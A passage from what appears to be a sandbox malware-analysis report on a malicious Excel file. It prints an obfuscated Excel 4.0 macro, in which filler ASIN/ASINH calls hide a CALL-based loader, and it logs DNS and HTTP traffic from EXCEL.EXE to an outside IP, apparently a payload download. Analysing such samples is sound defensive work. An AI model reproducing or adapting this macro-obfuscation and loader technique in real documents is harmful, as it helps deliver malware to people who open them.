1)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 05:54:07.267561913 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.429316044 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.429465055 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.430265903 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.591984034 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.883936882 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.883990049 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884031057 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884072065 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884110928 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884160995 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884180069 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884197950 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884208918 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884212017 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884239912 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884244919 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884279966 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884288073 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884320021 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:07.884332895 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.884402037 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:07.893683910 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045336962 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045422077 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045439959 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045598984 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045603991 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045627117 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045644045 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045715094 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045787096 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045804024 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045819998 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045836926 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045852900 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045866966 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045870066 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045893908 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045927048 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.045964003 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045980930 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.045998096 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046015978 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046041012 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.046063900 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.046128988 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046145916 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046161890 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046179056 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.046183109 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.046219110 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.048851013 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.206753016 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.206813097 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.206845999 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.206876993 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.207096100 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.208825111 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.208884001 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.208992004 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209228992 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209273100 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209276915 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209287882 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209312916 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209328890 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209352970 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209372044 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209403038 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209481001 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209527016 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209546089 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209574938 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209577084 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209619999 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209634066 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209660053 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209666967 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209713936 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209717035 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209757090 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209773064 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209796906 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209813118 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209836006 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209850073 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209877014 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209889889 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209914923 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209930897 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.209964037 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.209969997 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.210005999 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.210026026 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.210046053 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.210057974 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.210087061 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:54:08.210103035 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:54:08.210128069 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 05:54:07.238785028 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 05:54:07.251486063 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 05:54:07.238785028 CEST | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 05:54:07.251486063 CEST | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 05:54:07.430265903 CEST | 0 | OUT | |
Apr 7, 2021 05:54:07.883936882 CEST | 2 | IN |